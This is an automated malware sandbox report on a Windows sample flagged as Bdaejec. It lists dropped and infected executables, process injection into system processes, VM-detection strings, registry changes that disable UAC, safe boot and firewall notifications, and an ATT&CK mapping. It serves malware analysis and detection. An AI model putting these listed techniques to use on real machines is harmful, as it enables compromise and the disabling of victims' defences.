          Source: 1.0.0.2.exeStatic PE information: section name: pu entropy: 7.7594391065047255
          Source: iuepn.exe.0.drStatic PE information: section name: .text entropy: 7.988165420952291
          Source: rksowY.exe.0.drStatic PE information: section name: .text entropy: 7.81169422100848
          Source: winmefmb.exe.0.drStatic PE information: section name: .text entropy: 7.988165420952291
          Source: MyProg.exe.2.drStatic PE information: section name: Y|uR entropy: 6.934800097867026
          Source: SciTE.exe.2.drStatic PE information: section name: u entropy: 6.934468071332093
          Source: Uninstall.exe.2.drStatic PE information: section name: EpNuZ entropy: 6.934379233926794
          Source: initial sampleStatic PE information: section name: UPX0
          Source: initial sampleStatic PE information: section name: UPX1
          Source: initial sampleStatic PE information: section name: UPX0
          Source: initial sampleStatic PE information: section name: UPX1

          Persistence and Installation Behavior

          barindex
          Infects executable files (exe, dll, sys, html)
          Source: C:\Users\user\AppData\Local\Temp\rksowY.exeSystem file written: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\rksowY.exeSystem file written: C:\Program Files\7-Zip\Uninstall.exeJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\rksowY.exeSystem file written: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exeJump to behavior
          Source: C:\Users\user\Desktop\1.0.0.2.exeFile created: C:\Users\user\AppData\Local\Temp\winmefmb.exeJump to dropped file
          Source: C:\Users\user\AppData\Local\Temp\rksowY.exeFile created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeJump to dropped file
          Source: C:\Users\user\AppData\Local\Temp\rksowY.exeFile created: C:\Program Files\7-Zip\Uninstall.exeJump to dropped file
          Source: C:\Users\user\Desktop\1.0.0.2.exeFile created: C:\iuepn.exeJump to dropped file
          Source: C:\Users\user\Desktop\1.0.0.2.exeFile created: C:\Users\user\Desktop\VF.dllJump to dropped file
          Source: C:\Users\user\Desktop\1.0.0.2.exeFile created: C:\Users\user\AppData\Local\Temp\rksowY.exeJump to dropped file
          Source: C:\Users\user\AppData\Local\Temp\rksowY.exeFile created: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exeJump to dropped file
          Source: C:\Users\user\Desktop\1.0.0.2.exeRegistry key value modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfileJump to behavior

          Hooking and other Techniques for Hiding and Protection

          barindex
          May modify the system service descriptor table (often done to hook functions)
          Source: 1.0.0.2.exe, 00000000.00000002.2266402880.0000000002BE0000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: KeServiceDescriptorTable
          Uses known network protocols on non-standard ports
          Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 799
          Source: C:\Users\user\Desktop\1.0.0.2.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\1.0.0.2.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\1.0.0.2.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\1.0.0.2.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\1.0.0.2.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\1.0.0.2.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\1.0.0.2.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\1.0.0.2.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\rksowY.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\rksowY.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\rksowY.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\rksowY.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\rksowY.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\1.0.0.2.exeThread delayed: delay time: 180000Jump to behavior
          Source: C:\Users\user\Desktop\1.0.0.2.exeThread delayed: delay time: 300000Jump to behavior
          Source: C:\Users\user\Desktop\1.0.0.2.exeThread delayed: delay time: 360000Jump to behavior
          Source: C:\Users\user\Desktop\1.0.0.2.exeThread delayed: delay time: 2100000Jump to behavior
          Source: C:\Users\user\Desktop\1.0.0.2.exeThread delayed: delay time: 360000Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\rksowY.exeDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeJump to dropped file
          Source: C:\Users\user\Desktop\1.0.0.2.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\winmefmb.exeJump to dropped file
          Source: C:\Users\user\AppData\Local\Temp\rksowY.exeDropped PE file which has not been started: C:\Program Files\7-Zip\Uninstall.exeJump to dropped file
          Source: C:\Users\user\Desktop\1.0.0.2.exeDropped PE file which has not been started: C:\iuepn.exeJump to dropped file
          Source: C:\Users\user\Desktop\1.0.0.2.exeDropped PE file which has not been started: C:\Users\user\Desktop\VF.dllJump to dropped file
          Source: C:\Users\user\AppData\Local\Temp\rksowY.exeDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exeJump to dropped file
          Source: C:\Users\user\AppData\Local\Temp\rksowY.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_2-923
          Source: C:\Users\user\Desktop\1.0.0.2.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_0-7166
          Source: C:\Users\user\Desktop\1.0.0.2.exe TID: 6272Thread sleep time: -120000s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\1.0.0.2.exe TID: 4996Thread sleep time: -180000s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\1.0.0.2.exe TID: 1524Thread sleep time: -300000s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\1.0.0.2.exe TID: 2448Thread sleep time: -60000s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\1.0.0.2.exe TID: 3180Thread sleep time: -40000s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\1.0.0.2.exe TID: 3300Thread sleep time: -100000s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\1.0.0.2.exe TID: 3300Thread sleep time: -360000s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\1.0.0.2.exe TID: 4996Thread sleep time: -2100000s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\1.0.0.2.exe TID: 3300Thread sleep time: -360000s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\1.0.0.2.exeFile opened: PhysicalDrive0Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\rksowY.exeCode function: 2_2_005B1718 GetSystemTimeAsFileTime followed by cmp: cmp dword ptr [ebp+08h], 02h and CTI: jne 005B1754h2_2_005B1718
          Source: C:\Users\user\Desktop\1.0.0.2.exeCode function: 0_2_02B6BADD Sleep,FindFirstFileA,FindNextFileA,Sleep,0_2_02B6BADD
          Source: C:\Users\user\Desktop\1.0.0.2.exeCode function: 0_2_02B657A0 FindFirstFileA,FindNextFileA,Sleep,0_2_02B657A0
          Source: C:\Users\user\AppData\Local\Temp\rksowY.exeCode function: 2_2_005B29E2 memset,wsprintfA,memset,lstrlen,lstrcpyn,strrchr,lstrcmpiA,lstrlen,memset,memset,FindFirstFileA,memset,FindNextFileA,lstrcmpiA,FindNextFileA,FindClose,2_2_005B29E2
          Source: C:\Users\user\AppData\Local\Temp\rksowY.exeCode function: 2_2_005B2B8C memset,GetLogicalDriveStringsA,CreateThread,GetDriveTypeA,CreateThread,lstrlen,WaitForMultipleObjects,CreateThread,2_2_005B2B8C
          Source: C:\Users\user\Desktop\1.0.0.2.exeThread delayed: delay time: 120000Jump to behavior
          Source: C:\Users\user\Desktop\1.0.0.2.exeThread delayed: delay time: 180000Jump to behavior
          Source: C:\Users\user\Desktop\1.0.0.2.exeThread delayed: delay time: 300000Jump to behavior
          Source: C:\Users\user\Desktop\1.0.0.2.exeThread delayed: delay time: 360000Jump to behavior
          Source: C:\Users\user\Desktop\1.0.0.2.exeThread delayed: delay time: 2100000Jump to behavior
          Source: C:\Users\user\Desktop\1.0.0.2.exeThread delayed: delay time: 360000Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\rksowY.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\rksowY.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\UIThemes\Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\rksowY.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\rksowY.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\rksowY.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\rksowY.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\Jump to behavior
          Source: Amcache.hve.2.drBinary or memory string: VMware
          Source: dwm.exe, 00000007.00000002.3403250038.000001D156AA0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000gB
          Source: Amcache.hve.2.drBinary or memory string: VMware Virtual USB Mouse
          Source: Amcache.hve.2.drBinary or memory string: vmci.syshbin
          Source: Amcache.hve.2.drBinary or memory string: VMware, Inc.
          Source: rksowY.exe, 00000002.00000002.2243579607.0000000000BAF000.00000004.00000020.00020000.00000000.sdmp, rksowY.exe, 00000002.00000003.2179982958.0000000000BAF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWpi
          Source: Amcache.hve.2.drBinary or memory string: VMware20,1hbin@
          Source: Amcache.hve.2.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
          Source: Amcache.hve.2.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
          Source: Amcache.hve.2.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
          Source: Amcache.hve.2.drBinary or memory string: VMware-42 27 80 4d 99 30 0e 9c-c1 9b 2a 23 ea 1f c4 20
          Source: 1.0.0.2.exe, 00000000.00000003.2255260627.0000000001165000.00000004.00000020.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2266166178.0000000001172000.00000004.00000020.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2265887991.000000000108E000.00000004.00000020.00020000.00000000.sdmp, rksowY.exe, 00000002.00000002.2243579607.0000000000B6B000.00000004.00000020.00020000.00000000.sdmp, rksowY.exe, 00000002.00000003.2179982958.0000000000B6D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
          Source: Amcache.hve.2.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
          Source: Amcache.hve.2.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
          Source: 1.0.0.2.exe, 00000000.00000003.2255260627.0000000001165000.00000004.00000020.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2266166178.0000000001172000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWk<=
          Source: Amcache.hve.2.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
          Source: Amcache.hve.2.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
          Source: Amcache.hve.2.drBinary or memory string: vmci.sys
          Source: Amcache.hve.2.drBinary or memory string: vmci.syshbin`
          Source: Amcache.hve.2.drBinary or memory string: \driver\vmci,\driver\pci
          Source: Amcache.hve.2.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
          Source: Amcache.hve.2.drBinary or memory string: VMware20,1
          Source: Amcache.hve.2.drBinary or memory string: Microsoft Hyper-V Generation Counter
          Source: Amcache.hve.2.drBinary or memory string: NECVMWar VMware SATA CD00
          Source: Amcache.hve.2.drBinary or memory string: VMware Virtual disk SCSI Disk Device
          Source: Amcache.hve.2.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
          Source: Amcache.hve.2.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
          Source: Amcache.hve.2.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
          Source: Amcache.hve.2.drBinary or memory string: VMware PCI VMCI Bus Device
          Source: Amcache.hve.2.drBinary or memory string: VMware VMCI Bus Device
          Source: Amcache.hve.2.drBinary or memory string: VMware Virtual RAM
          Source: Amcache.hve.2.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
          Source: dwm.exe, 00000007.00000002.3403250038.000001D156B0A000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
          Source: rksowY.exe, 00000002.00000002.2243579607.0000000000B6B000.00000004.00000020.00020000.00000000.sdmp, rksowY.exe, 00000002.00000003.2179982958.0000000000B6D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWengineer
          Source: Amcache.hve.2.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
          Source: C:\Users\user\Desktop\1.0.0.2.exeAPI call chain: ExitProcess graph end nodegraph_0-7250
          Source: C:\Users\user\Desktop\1.0.0.2.exeAPI call chain: ExitProcess graph end nodegraph_0-7364
          Source: C:\Users\user\AppData\Local\Temp\rksowY.exeAPI call chain: ExitProcess graph end nodegraph_2-898
          Source: C:\Users\user\Desktop\1.0.0.2.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Users\user\Desktop\1.0.0.2.exeCode function: 0_2_02BEBCD0 EntryPoint,LoadLibraryA,GetProcAddress,ExitProcess,VirtualProtect,VirtualProtect,VirtualProtect,0_2_02BEBCD0
          Source: C:\Users\user\Desktop\1.0.0.2.exeCode function: 0_2_00D63044 mov eax, dword ptr fs:[00000030h]0_2_00D63044
          Source: C:\Users\user\Desktop\1.0.0.2.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Users\user\Desktop\1.0.0.2.exeProcess token adjusted: DebugJump to behavior

          HIPS / PFW / Operating System Protection Evasion

          barindex
          Allocates memory in foreign processes
          Source: C:\Users\user\Desktop\1.0.0.2.exeMemory allocated: C:\Windows\System32\fontdrvhost.exe base: AD0000 protect: page execute and read and writeJump to behavior
          Source: C:\Users\user\Desktop\1.0.0.2.exeMemory allocated: C:\Windows\System32\fontdrvhost.exe base: DE0000 protect: page execute and read and writeJump to behavior
          Source: C:\Users\user\Desktop\1.0.0.2.exeMemory allocated: C:\Windows\System32\dwm.exe base: 380000 protect: page execute and read and writeJump to behavior
          Contains functionality to inject threads in other processes
          Source: C:\Users\user\Desktop\1.0.0.2.exeCode function: 0_2_02B6CC92 LookupPrivilegeValueA,AdjustTokenPrivileges,AdjustTokenPrivileges,FindCloseChangeNotification,GetTokenInformation,GetTokenInformation,lstrcmpiA,CreateMutexA,VirtualAllocEx,WriteProcessMemory,CreateRemoteThread,FindCloseChangeNotification,0_2_02B6CC92
          Writes to foreign memory regions
          Source: C:\Users\user\Desktop\1.0.0.2.exeMemory written: C:\Windows\System32\fontdrvhost.exe base: AD0000Jump to behavior
          Source: C:\Users\user\Desktop\1.0.0.2.exeMemory written: C:\Windows\System32\fontdrvhost.exe base: DE0000Jump to behavior
          Source: C:\Users\user\Desktop\1.0.0.2.exeMemory written: C:\Windows\System32\dwm.exe base: 380000Jump to behavior
          Source: dwm.exe, 00000007.00000002.3402120107.000001D154AB0000.00000002.00000001.00040000.00000000.sdmp, dwm.exe, 00000007.00000000.2165032410.000001D154AB1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: IProgram Manager
          Source: dwm.exe, 00000007.00000002.3405771317.000001D159439000.00000004.00000001.00020000.00000000.sdmp, dwm.exe, 00000007.00000000.2226927771.000001D159439000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Program Manager
          Source: dwm.exe, 00000007.00000002.3402120107.000001D154AB0000.00000002.00000001.00040000.00000000.sdmp, dwm.exe, 00000007.00000000.2165032410.000001D154AB1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
          Source: dwm.exe, 00000007.00000002.3402120107.000001D154AB0000.00000002.00000001.00040000.00000000.sdmp, dwm.exe, 00000007.00000000.2165032410.000001D154AB1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
          Source: SciTE.exe.2.drBinary or memory string: Ctrl+RightLeftDownUpDecimalMinusMultiplyDivideTabSpaceDeleteEscapeEndInsertEnterHomeForwardBackwardPLAT_WIN1PageDownPageUpMenuWinSciTEACCELSSciTEWindowContentSciTEWindowPLAT_WINNT1toolbar.largecreate.hidden.consolegbkbig5euc-krshift_jisutf-8asciilatin2latin1translation.encodingwindows-1251ScaleFactoriso-8859-5cyrillic1250iso8859-11SciTE_HOMEAppsUseLightThemeSciTE_USERHOMESciTE_HOMEPropertiesScaleFactorSoftware\Microsoft\Windows\CurrentVersion\Themes\PersonalizeEmbeddedRich Text FormatButtonShell_TrayWndUSERPROFILESciTE_HOMEHtmlHelpWHHCTRL.OCX
          Source: dwm.exe, 00000007.00000002.3402120107.000001D154AB0000.00000002.00000001.00040000.00000000.sdmp, dwm.exe, 00000007.00000000.2165032410.000001D154AB1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
          Source: C:\Users\user\AppData\Local\Temp\rksowY.exeCode function: 2_2_005B1718 GetSystemTimeAsFileTime,SHSetValueA,SHGetValueA,__aulldiv,__aulldiv,2_2_005B1718
          Source: C:\Users\user\Desktop\1.0.0.2.exeCode function: 0_2_02B61B0E GetUserNameA,RegOpenKeyExA,RegCreateKeyA,GlobalAlloc,GlobalFree,0_2_02B61B0E
          Source: C:\Users\user\AppData\Local\Temp\rksowY.exeCode function: 2_2_005B139F GetVersionExA,LookupPrivilegeValueA,GetCurrentProcessId,2_2_005B139F

          Lowering of HIPS / PFW / Operating System Security Settings

          barindex
          Changes security center settings (notifications, updates, antivirus, firewall)
          Source: C:\Users\user\Desktop\1.0.0.2.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center AntiVirusOverrideJump to behavior
          Deletes keys which are related to windows safe boot (disables safe mode boot)
          Source: C:\Users\user\Desktop\1.0.0.2.exeRegistry key or value deleted: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SafeBoot AlternateShellJump to behavior
          Disables UAC (registry)
          Source: C:\Users\user\Desktop\1.0.0.2.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System EnableLUAJump to behavior
          Disables user account control notifications
          Source: C:\Users\user\Desktop\1.0.0.2.exeRegistry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security CenterJump to behavior
          Source: C:\Users\user\Desktop\1.0.0.2.exeRegistry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\SvcJump to behavior
          Source: C:\Users\user\Desktop\1.0.0.2.exeRegistry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\SvcJump to behavior
          Source: C:\Users\user\Desktop\1.0.0.2.exeRegistry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\SvcJump to behavior
          Source: C:\Users\user\Desktop\1.0.0.2.exeRegistry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\SvcJump to behavior
          Source: C:\Users\user\Desktop\1.0.0.2.exeRegistry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\SvcJump to behavior
          Source: C:\Users\user\Desktop\1.0.0.2.exeRegistry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\SvcJump to behavior
          Source: C:\Users\user\Desktop\1.0.0.2.exeRegistry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\SvcJump to behavior
          Source: C:\Users\user\Desktop\1.0.0.2.exeRegistry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\SvcJump to behavior
          Source: C:\Users\user\Desktop\1.0.0.2.exeRegistry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\SvcJump to behavior
          Source: C:\Users\user\Desktop\1.0.0.2.exeRegistry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\SvcJump to behavior
          Source: C:\Users\user\Desktop\1.0.0.2.exeRegistry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\SvcJump to behavior
          Source: C:\Users\user\Desktop\1.0.0.2.exeRegistry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\SvcJump to behavior
          Source: C:\Users\user\Desktop\1.0.0.2.exeRegistry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\SvcJump to behavior
          Source: C:\Users\user\Desktop\1.0.0.2.exeRegistry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\SvcJump to behavior
          Source: C:\Users\user\Desktop\1.0.0.2.exeRegistry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\SvcJump to behavior
          Source: C:\Users\user\Desktop\1.0.0.2.exeRegistry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\SvcJump to behavior
          Source: C:\Users\user\Desktop\1.0.0.2.exeRegistry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\SvcJump to behavior
          Source: C:\Users\user\Desktop\1.0.0.2.exeRegistry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\SvcJump to behavior
          Source: C:\Users\user\Desktop\1.0.0.2.exeRegistry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\SvcJump to behavior
          Source: C:\Users\user\Desktop\1.0.0.2.exeRegistry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\SvcJump to behavior
          Source: C:\Users\user\Desktop\1.0.0.2.exeRegistry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\SvcJump to behavior
          Source: C:\Users\user\Desktop\1.0.0.2.exeRegistry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\SvcJump to behavior
          Source: C:\Users\user\Desktop\1.0.0.2.exeRegistry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\SvcJump to behavior
          Source: C:\Users\user\Desktop\1.0.0.2.exeRegistry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\SvcJump to behavior
          Source: C:\Users\user\Desktop\1.0.0.2.exeRegistry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\SvcJump to behavior
          Source: C:\Users\user\Desktop\1.0.0.2.exeRegistry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\SvcJump to behavior
          Source: C:\Users\user\Desktop\1.0.0.2.exeRegistry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\SvcJump to behavior
          Source: C:\Users\user\Desktop\1.0.0.2.exeRegistry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\SvcJump to behavior
          Source: C:\Users\user\Desktop\1.0.0.2.exeRegistry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\SvcJump to behavior
          Modifies the windows firewall
          Source: C:\Users\user\Desktop\1.0.0.2.exeRegistry key created or modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile DisableNotificationsJump to behavior
          Modifies the windows firewall notifications settings
          Source: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfileRegistry value created: DisableNotifications 1Jump to behavior
          Source: Amcache.hve.2.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
          Source: Amcache.hve.2.drBinary or memory string: msmpeng.exe
          Source: Amcache.hve.2.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
          Source: Amcache.hve.2.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
          Source: Amcache.hve.2.drBinary or memory string: MsMpEng.exe

          Stealing of Sensitive Information

          barindex
          Yara detected Bdaejec
          Source: Yara matchFile source: Process Memory Space: rksowY.exe PID: 5344, type: MEMORYSTR

          Remote Access Functionality

          barindex
          Yara detected Bdaejec
          Source: Yara matchFile source: Process Memory Space: rksowY.exe PID: 5344, type: MEMORYSTR
          Source: C:\Users\user\Desktop\1.0.0.2.exeCode function: 0_2_02B63911 socket,setsockopt,bind,recvfrom,0_2_02B63911

          Mitre Att&ck Matrix

          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
          Gather Victim Identity InformationAcquire Infrastructure11
          Replication Through Removable Media          		3
          Native API          		1
          DLL Side-Loading          		1
          DLL Side-Loading          		6
          Disable or Modify Tools          		1
          Credential API Hooking          		11
          System Time Discovery          		1
          Taint Shared Content          		1
          Archive Collected Data          		4
          Ingress Tool Transfer          		Exfiltration Over Other Network Medium1
          Inhibit System Recovery
          CredentialsDomainsDefault AccountsScheduled Task/Job1
          Windows Service          		1
          Bypass User Account Control          		21
          Obfuscated Files or Information          		11
          Input Capture          		1
          Peripheral Device Discovery          		Remote Desktop Protocol1
          Credential API Hooking          		1
          Encrypted Channel          		Exfiltration Over BluetoothNetwork Denial of Service
          Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
          Access Token Manipulation          		121
          Software Packing          		Security Account Manager1
          Account Discovery          		SMB/Windows Admin Shares11
          Input Capture          		11
          Non-Standard Port          		Automated ExfiltrationData Encrypted for Impact
